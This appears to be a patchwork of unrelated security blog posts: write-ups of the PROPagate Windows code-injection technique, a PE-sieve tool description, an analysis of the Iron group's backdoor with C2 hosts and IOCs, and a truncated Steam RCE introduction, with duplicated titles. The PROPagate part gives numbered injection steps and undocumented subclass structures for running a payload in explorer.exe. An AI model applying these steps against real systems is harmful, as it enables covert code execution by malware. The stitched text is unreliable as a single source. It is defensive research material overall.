When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

PE-sieve — Hook Finder is open source tool based on libpeconv.

PE-sieve (previously known as Hook Finder) is open source tool based on libpeconv.
It scans a given process, searching for manually loaded or modified modules. When found, it dumps the modified/suspicious PE along with a report in JSON format, detailing about the found indicators.
Currently it detects inline hooks, hollowed processes, Process Doppelgänging, injected PE files etc. In case if the PE file was patched in the memory, it gives a detailed report about where are the changed bytes (and few other properties).

The tool is under rapid development, so expect frequent updates.

PE-sieve is available in 2 versions – as standalone executable, and as a DLL. The DLL version became a base of my other project: HollowsHunter – that makes an automated scan of all the running processes. More about it in the further part of the post.

Where to get it?

The tool is open-source, available on my github:

  https://github.com/hasherezade/pe-sieve

Usage

It has a simple, commandline interface. When run without parameters, it displays info about the version and required arguments:

When you run it giving a PID of the running process, it scans all the PE modules in its memory (the main executable, but also all the loaded DLLs). At the end, you can see the summary of how many anomalies have been detected of which type.

In case if some modified modules has been detected, they are dumped to a folder of a given process, for example:

Short history & features

Detecting inline hooks and patches

I started creating it for the purpose of searching and examining inline hooks. You can see it in action here (old version):

It not only detects that there IS an anomaly/patch, but also WHERE exactly it is. For each dumped PE where the patches were found, it creates a file with tags, that can be loaded by PE-bear.

Thanks to this, we can easily browse the found hooks and check the code that was overwritten.

For example – in the application presented above, the Entry Point was patched and the execution was redirected to the added, malicious section:

Detecting hollowed processes

Later, I extended it to detect process hollowing etc – and it turned out to be pretty convenient unpacker:

Detecting Process Doppelgänging

In a similar manner, it can detects some other methods of impersonating a processes, for example Process Doppelgänging. The malicious payload is directly dumped and ready to be analyzed:

Recovering erased imports

PE-sieve has an ability to recover erased imports. In order to enable it, deploy it with appropriate option. Example – unpacking manually loaded payloads with imports erased (Emotet):

Future development

The project is still not finished and I have many ideas how to make it better. I am planning to detect not only code modifications, but also other types of hooking, such as IAT and EAT patching.

Some in-memory patches are done by legitimate applications, so, in the future version I will provide capability of whitelisting defined patches.

I am also planning to extend its dumping capabilities against the malicious processes that are trying to defend themselves against dumpers etc.

PE-sieve as a DLL

During the development process I got an idea to make a DLL version of the PE-sieve, so that it can be incorporated in other projects.

Building PE-sieve from sources as a DLL is very easy – you just need to set one CMake option: PE_SIEVE_AS_DLL:

build_as_dll

The PE-sieve DLL exposes a minimalistic API. Two functions are exported:

pe-sieve_func

  1. PESieve_help – displays a short info and the version of the DLL.
  2. PESieve_scan – a typical scan with a given parameters, like in the PE-Sieve.exe

The necessary headers needs to be included from the folder “pe-sieve\include“:

https://github.com/hasherezade/pe-sieve/tree/master/include

I have plans to enrich the API in the future. For now, you can see the PE-sieve DLL in action in the HollowsHunter project.

Ideas? Bugs?

If you noticed bug or have an idea for a useful feature, don’t hesitate to mail me or create a Github issue – I check them regularly:

https://github.com/hasherezade/pe-sieve/issues

Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis

In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code. We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.

During the past year and a half, the Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

In this technical blog post we are going to take a look at the malware samples found during the research.

Technical Analysis:

Installer:

** This installer sample (and in general most of the samples found) is protected with VMProtect then compressed using UPX.

Installation process:

1. Check if the binary is executed on a VM, if so – ExitProcess

2. Drop & Install malicious chrome extension
%localappdata%\Temp\chrome.crx
3. Extract malicious chrome extension to %localappdata%\Temp\chrome & create a scheduled task to execute %localappdata%\Temp\chrome\sec.vbs.
4. Create mutex using the CPU’s version to make sure there’s no existing running instance of itself.
5. Drop backdoor dll to %localappdata%\Temp\\<random>.dat.
6. Check OS version:
.If Version == Windows XP then just invoke ‘Launch’ export of Iron Backdoor for a one-time non persistent execution.
.If Version > Windows XP
-Invoke ‘Launch’ export
-Check if Qhioo360 – only if not proceed, Install malicious certificate used to sign Iron Backdoor binary as root CA.Then create a service called ‘helpsvc’ pointing back to Iron Backdoor dll.

Using the leaked HackingTeam source code:

Once we Analyzed the backdoor sample, we immediately noticed it’s partially based on HackingTeam’s source code for their Remote Control System hacking tool, which leaked about 3 years ago. Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam’s source in both IronStealer and Iron ransomware.

1.Anti-VM: Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant leaked source code. This piece of code supports detecting Cuckoo Sandbox, VMWare product & Oracle’s VirtualBox. Screenshot:

 

2. Dynamic Function Calls: Iron Backdoor is also using the DynamicCall module from HackingTeam’s “core” library. This module is used to dynamically call external library function by obfuscated the function name, which makes static analysis of this malware more complex.
In the following screenshot you can see obfuscated “LFSOFM43/EMM” and “DsfbufGjmfNbqqjohB”, which represents “kernel32.dll” and “CreateFileMappingA” API.

For a full list of obfuscated APIs you can visit obfuscated_calls.h.

Malicious Chrome extension:

A patched version of the popular Adblock Plus chrome extension is used to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.


**patched include.preload.js injects two malicious scripts from the attacker’s Pastebin account.

The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it as you can see in the following screenshot:

Internet Explorer(deprecated):

Iron Backdoor itself embeds adblockplusie – Adblock Plus for IE, which is modified in a similar way to the malicious chrome extension, injecting remote javascript. It seems that this functionality is no longer automatically used for some unknown reason.

Persistence:

Before installing itself as a Windows service, the malware checks for the presence of either 360 Safe Guard or 360 Internet Security by reading following registry keys:

.SYSTEM\CurrentControlSet\Services\zhudongfangyu.
.SYSTEM\CurrentControlSet\Services\360rp

If one of these products is installed, the malware will only run once without persistence. Otherwise, the malware will proceed to installing rouge, hardcoded root CA certificate on the victim’s workstation. This fake root CA supposedly signed the malware’s binaries, which will make them look legitimate.

Comic break: The certificate is protected by the password ‘caonima123’, which means “f*ck your mom” in Mandarin.

IronStealer (<RANDOM>.dat):

Persistent backdoor, dropper and cryptocurrency theft module.

1. Load Cobalt Strike beacon:
The malware automatically decrypts hard coded shellcode stage-1, which in turn loads Cobalt Strike beacon in-memory, using a reflective loader:

Beacon: hxxp://dazqc4f140wtl.cloudfront[.]net/ZZYO

2. Drop & Execute payload: The payload URL is fetched from a hardcoded Pastebin paste address:

We observed two different payloads dropped by the malware:

1. Xagent – A variant of “JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms. JbossMiner is using known database vulnerabilities to spread. “Xagent” is the original filename Xagent<VER>.exe whereas <VER> seems to be the version of the worm. The last version observed was version 6 (Xagent6.exe).

**Xagent versions 4-6 as seen by VT

2. Iron ransomware – We recently saw a shift from dropping Xagent to dropping Iron ransomware. It seems that the wallet & payment portal addresses are identical to the ones that Bart observed. Requested ransom decreased from 0.2 BTC to 0.05 BTC, most likely due to the lack of payment they received.

**Nobody paid so they decreased ransom to 0.05 BTC

3. Stealing cryptocurrency from the victim’s workstation: Iron backdoor would drop the latest voidtool Everything search utility and actually silent install it on the victim’s workstation using msiexec. After installation was completed, Iron Backdoor uses Everything in order to find files that are likely to contain cryptocurrency wallets, by filename patterns in both English and Chinese.

Full list of patterns extracted from sample:
– Wallet.dat
– UTC–
– Etherenum keystore filename
– *bitcoin*.txt
– *比特币*.txt
– “Bitcoin”
– *monero*.txt
– *门罗币*.txt
– “Monroe Coin”
– *litecoin*.txt
– *莱特币*.txt
– “Litecoin”
– *Ethereum*.txt
– *以太币*.txt
– “Ethereum”
– *miner*.txt
– *挖矿*.txt
– “Mining”
– *blockchain*.txt
– *coinbase*

4. Hijack on-going payments in cryptocurrency: IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account:

Pastebin Account:

As part of the investigation, we also tried to figure out what additional information we may learn from the attacker’s Pastebin account:

The account was probably created using the mail fineisgood123@gmail[.]com – the same email address used to register blockbitcoin[.]com (the attacker’s crypto-mining pool & malware host) and swb[.]one (Old server used to host malware & leaked files. replaced by u.cacheoffer[.]tk):

1. Index.html: HTML page referring to a fake Firefox download page.
2. crystal_ext-min + angular: JS inject using malicious Chrome extension.
3. android: This paste holds a command line for an unknown backdoored application to execute on infected Android devices. This command line invokes remote Metasploit stager (android.apk) and drops cpuminer 2.3.2 (minerd.txt) built for ARM processor. Considering the last update date (18/11/17) and the low number of views, we believe this paste is obsolete.

4. androidminer: Holds the cpuminer command line to execute for unknown malicious android applications, at the time of writing this post, this paste received nearly 2000 hits.

Aikapool[.]com is a public mining pool and port 7915 is used for DogeCoin:

The username (myapp2150) was used to register accounts in several forums and on Reddit. These accounts were used to advertise fake “blockchain exploit tool”, which infects the victim’s machine with Cobalt Strike, using a similar VBScript to the one found by Malwrologist (ps5.sct).

XAttacker: Copy of XAttacker PHP remote file upload script.
miner: Holds payload URL, as mentioned above (IronStealer).

FAQ:

How many victims are there?
It is hard to define for sure, , but to our knowledge, the total of the attacker’s pastes received around 14K views, ~11K for dropped payload URL and ~2k for the android miner paste. Based on that, we estimate that the group has successfully infected, a few thousands victims.

Who is Iron group?
We suspect that the person or persons behind the group are Chinese, due in part to the following findings:
. There were several leftover comments in the plugin in Chinese.
. Root CA Certificate password (‘f*ck your mom123’ was in Mandarin)
We also suspect most of the victims are located in China, because of the following findings:
. Searches for wallet file names in Chinese on victims’ workstations.
. Won’t install persistence if Qhioo360(popular Chinese AV) is found

IOCS:

 

  • blockbitcoin[.]com
  • pool.blockbitcoin[.]com
  • ssl2.blockbitcoin[.]com
  • xmr.enjoytopic[.]tk
  • down.cacheoffer[.]tk
  • dzebppteh32lz.cloudfront[.]net
  • dazqc4f140wtl.cloudfront[.]net
  • androidapt.s3-accelerate.amazonaws[.]com
  • androidapt.s3-accelerate.amazonaws[.]com
  • winapt.s3-accelerate.amazonaws[.]com
  • swb[.]one
  • bitcoinwallet8[.]com
  • blockchaln[.]info
  • 6350a42d423d61eb03a33011b6054fb7793108b7e71aee15c198d3480653d8b7
  • a4faaa0019fb63e55771161e34910971fd8fe88abda0ab7dd1c90cfe5f573a23
  • ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9
  • 654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190
  • 980a39b6b72a7c8e73f4b6d282fae79ce9e7934ee24a88dde2eead0d5f238bda
  • 39a991c014f3093cdc878b41b527e5507c58815d95bdb1f9b5f90546b6f2b1f6
  • a3c8091d00575946aca830f82a8406cba87aa0b425268fa2e857f98f619de298
  • 0f7b9151f5ff4b35761d4c0c755b6918a580fae52182de9ba9780d5a1f1beee8
  • ea338755e8104d654e7d38170aaae305930feabf38ea946083bb68e8d76a0af3
  • 4de16be6a9de62b1ff333dd94e63128e677eb6a52d9fbbe55d8a09a2cab161f1
  • 92b4eed5d17cb9892a9fe146d61787025797e147655196f94d8eaf691c34be8c
  • 6314162df5bc2db1200d20221641abaac09ac48bc5402ec29191fd955c55f031
  • 7f3c07454dab46b27e11fcefd0101189aa31e84f8498dcb85db2b010c02ec190
  • 927e61b57c124701f9d22abbc72f34ebe71bf1cd717719f8fc6008406033b3e9
  • f1cbacea1c6d05cd5aa6fc9532f5ead67220d15008db9fa29afaaf134645e9de
  • 1d34a52f9c11d4bf572bf678a95979046804109e288f38dfd538a57a12fc9fd1
  • 2f5fb4e1072044149b32603860be0857227ed12cde223b5be787c10bcedbc51a
  • 0df1105cbd7bb01dca7e544fb22f45a7b9ad04af3ffaf747b5ecc2ffcd8c6dee
  • 388c1aecdceab476df8619e2d722be8e5987384b08c7b810662e26c42caf1310
  • 0b8473d3f07a29820f456b09f9dc28e70af75f9dec88668fb421a315eec9cb63
  • 251345b721e0587f1f08f54a81e26abac075acf3c4473a2c3ba8efcedc3b2459
  • b1fe223cbb01ff2a658c8ff51d386b5df786fd36278ee081c714adf946145047
  • 2886e25a86a57355a8a09a84781a9b032de10c3e40339a9ad0c10b63f7f8e7c7
  • 1d17eb102e75c08ab6f54387727b12ec9f9ee1960c8e5dc7f9925d41a943cabf
  • 5831dabe27e0211028296546d4e637770fd1ec5f2c8c5add51d0ea09b6ea3f0d
  • 85b0d44f3e8fd636a798960476a1f71d6fe040fbe44c92dfa403d0d014ff66cc
  • 936f4ce3570017ef5db14fb68f5e775a417b65f3b07094475798f24878d84907
  • 484b4cd953c9993090947fbb31626b76d7eee60c106867aa17e408556d27b609
  • 1cbd51d387561cafddf10699177a267cd5d2d184842bb43755a0626fdc4f0f3c
  • e41a805d780251cb591bcd02e5866280f8a99f876cfa882b557951e30dfdd142
  • b8107197469839a82cae25c3d3b5c25b5c0784736ca3b611eb3e8e3ced8ec950
  • b0442643d321003af965f0f41eb90cff2a198d11b50181ef8b6f530dd22226a7
  • 657a3a4a78054b8d6027a39a5370f26665ee10e46673a1f4e822a2a31168e5f9
  • 5977bee625ed3e91c7f30b09be9133c5838c59810659057dcfd1a5e2cf7c1936
  • 9ea69b49b6707a249e001b5f2caaab9ee6f6f546906445a8c51183aafe631e9f
  • 283536c26bb4fd4ea597d59c77a84ab812656f8fe980aa8556d44f9e954b1450
  • 21f1a867fa6a418067be9c68d588e2eeba816bffcb10c9512f3b7927612a1221
  • 45f794304919c8aa9282b0ee84c198703a41cc2254fe93634642ada3511239d2
  • 70e47fdff286fdfe031d05488bc727f5df257eacaa0d29431fb69ce680f6fb0c
  • ce7161381a0a0495ef998b5e202eb3e8fa2945dfdba0fd2a612d68b986c92678
  • b8d548ab2a1ce0cf51947e63b37fe57a0c9b105b2ef36b0abc1abf26d848be00
  • 74e777af58a8ee2cff4f9f18013e5b39a82a4c4f66ea3e17d06e5356085265b7
  • cd4d1a6b3efb3d280b8d4e77e306e05157f6ef8a226d7db08ac2006cce95997c
  • 78a07502443145d762536afaabd4d6139b81ca3cc9f8c28427ec724a3107e17b
  • 729ab4ff5da471f210a8658f4a7b2a30522534a212ac44e4d76f258baab19ccb
  • ca0df32504d3cf78d629e33b055213df5f71db3d5a0313ebc07fe2c05e506826
  • fc9d150d1a7cbda2600e4892baad91b9a4b8c52d31a41fd686c21c7801d1dd8c
  • bf2984b866c449a8460789de5871864eec19a7f9cadd7d883898135a4898a38a
  • 9d817d77b651d2627e37c01037e13808e1047f9528799a435c7bc04e877d70b3
  • 8fdec2e23032a028b8bd326dc709258a2f705c605f6222fc0c1616912f246f91
  • dbe165a63ed14e6c9bdcd314cf54d173e68db9d36623b09057d0a4d0519f1306
  • 64f96042ab880c0f2cd4c39941199806737957860387a65939b656d7116f0c7e
  • e394b1a1561c94621dbd63f7b8ea7361485a1f903f86800d50bd7e27ad801a5f
  • 506647c5bfad858ff6c34f93c74407782abbac4da572d9f44112fee5238d9ae1
  • 194362ce71adcdfa0fe976322a7def8bb2d7fb3d67a44716aa29c2048f87f5bc
  • 3652ea75ce5d8cfa0000a40234ae3d955781bcb327eecfee8f0e2ecae3a82870
  • 97d41633e74eccf97918d248b344e62431b74c9447032e9271ed0b5340e1dba0
  • a8ab5be12ca80c530e3ef5627e97e7e38e12eaf968bf049eb58ccc27f134dc7f
  • 37bea5b0a24fa6fed0b1649189a998a0e51650dd640531fe78b6db6a196917a7
  • 7e750be346f124c28ddde43e87d0fbc68f33673435dddb98dda48aa3918ce3bd
  • fcb700dbb47e035f5379d9ce1ada549583d4704c1f5531217308367f2d4bd302
  • b638dcce061ed2aa5a1f2d56fc5e909aa1c1a28636605a3e4c0ad72d49b7aec6
  • f2e4528049f598bdb25ce109a669a1f446c6a47739320a903a9254f7d3c69427
  • afd7ab6b06b87545c3a6cdedfefa63d5777df044d918a505afe0f57179f246e9
  • 9b654fd24a175784e3103d83eba5be6321142775cf8c11c933746d501ca1a5a1
  • e6c717b06d7ded23408461848ad0ee734f77b17e399c6788e68bc15219f155d7
  • e302aa06ad76b7e26e7ba2c3276017c9e127e0f16834fb7c8deae2141db09542
  • d020ea8159bb3f99f394cd54677e60fadbff2b91e1a2e91d1c43ba4d7624244d
  • 36104d9b7897c8b550a9fad9fe2f119e16d82fb028f682d39a73722822065bd3
  • d20cd3e579a04c5c878b87cc7bd6050540c68fdd8e28f528f68d70c77d996b16
  • ee859581b2fcea5d4ff633b5e40610639cd6b11c2b4fc420720198f49fbd1d31
  • ef2c384c795d5ca8ce17394e278b5c98f293a76047a06fc672da38bb56756aec
  • bd56db8d304f36af7cb0380dcbbc3c51091e3542261affb6caac18fa6a6988ec
  • 086d989f14e14628af821b72db00d0ef16f23ba4d9eaed2ec03d003e5f3a96a1
  • f44c3fd546b8c74cc58630ebcb5bea417696fac4bb89d00da42202f40da31354
  • 320bb1efa1263c636702188cd97f68699aebbb88c2c2c92bf97a68e689fa6f89
  • 42faf3af09b955de1aead2b99a474801b2c97601a52541af59d35711fafb7c6d
  • 6e0adfd1e30c116210f469d76e60f316768922df7512d40d5faf65820904821b
  • eea2d72f3c9bed48d4f5c5ad2bef8b0d29509fc9e650655c6c5532cb39e03268
  • 1a31e09a2a982a0fedd8e398228918b17e1bde6b20f1faf291316e00d4a89c61
  • 042efe5c5226dd19361fb832bdd29267276d7fa7a23eca5ced3c2bb7b4d30f7d
  • 274717d4a4080a6f2448931832f9eeb91cc0cbe69ff65f2751a9ace86a76e670
  • f8751a004489926ceb03321ea3494c54d971257d48dadbae9e8a3c5285bd6992
  • d5a296bac02b0b536342e8fb3b9cb40414ea86aa602353bc2c7be18386b13094
  • 49cfeb6505f0728290286915f5d593a1707e15effcfb62af1dd48e8b46a87975
  • 5f2b13cb2e865bb09a220a7c50acc3b79f7046c6b83dbaafd9809ecd00efc49a
  • 5a5bbc3c2bc2d3975bc003eb5bf9528c1c5bf400fac09098490ea9b5f6da981f
  • 2c025f9ffb7d42fcc0dc8d056a444db90661fb6e38ead620d325bee9adc2750e
  • aaa6ee07d1c777b8507b6bd7fa06ed6f559b1d5e79206c599a8286a0a42fe847
  • ac89400597a69251ee7fc208ad37b0e3066994d708e15d75c8b552c50b57f16a
  • a11bf4e721d58fcf0f44110e17298f6dc6e6c06919c65438520d6e90c7f64d40
  • 017bdd6a7870d120bd0db0f75b525ddccd6292a33aee3eecf70746c2d37398bf
  • ae366fa5f845c619cacd583915754e655ad7d819b64977f819f3260277160141
  • 9b40a0cd49d4dd025afbc18b42b0658e9b0707b75bb818ab70464d8a73339d52
  • 57daa27e04abfbc036856a22133cbcbd1edb0662617256bce6791e7848a12beb
  • 6c54b73320288c11494279be63aeda278c6932b887fc88c21c4c38f0e18f1d01
  • ba644e050d1b10b9fd61ac22e5c1539f783fe87987543d76a4bb6f2f7e9eb737
  • 21a83eeff87fba78248b137bfcca378efcce4a732314538d2e6cd3c9c2dd5290
  • 2566b0f67522e64a38211e3fe66f340daaadaf3bcc0142f06f252347ebf4dc79
  • 692ae8620e2065ad2717a9b7a1958221cf3fcb7daea181b04e258e1fc2705c1e
  • 426bc7ffabf01ebfbcd50d34aecb76e85f69e3abcc70e0bcd8ed3d7247dba76e

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
